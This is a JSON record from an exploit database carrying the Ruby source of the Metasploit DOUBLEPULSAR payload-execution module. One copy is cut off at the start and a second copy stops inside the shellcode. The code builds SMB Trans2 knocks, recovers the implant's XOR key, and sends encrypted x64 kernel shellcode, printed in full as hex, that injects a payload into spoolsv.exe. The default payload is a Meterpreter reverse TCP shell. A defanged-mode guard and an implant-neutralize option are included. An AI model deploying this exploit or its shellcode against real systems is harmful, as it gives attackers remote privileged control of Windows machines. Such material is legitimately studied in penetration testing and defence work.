bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-28] #"}, "lastseen": "2021-09-28T06:16:50", "differentElements": ["sourceData"], "edition": 28}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "c7b3d08ef8058e323fe3bacbbc297ee3", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-28T22:23:32", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:42030", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-28T06:16:50", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-28T06:16:50", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n 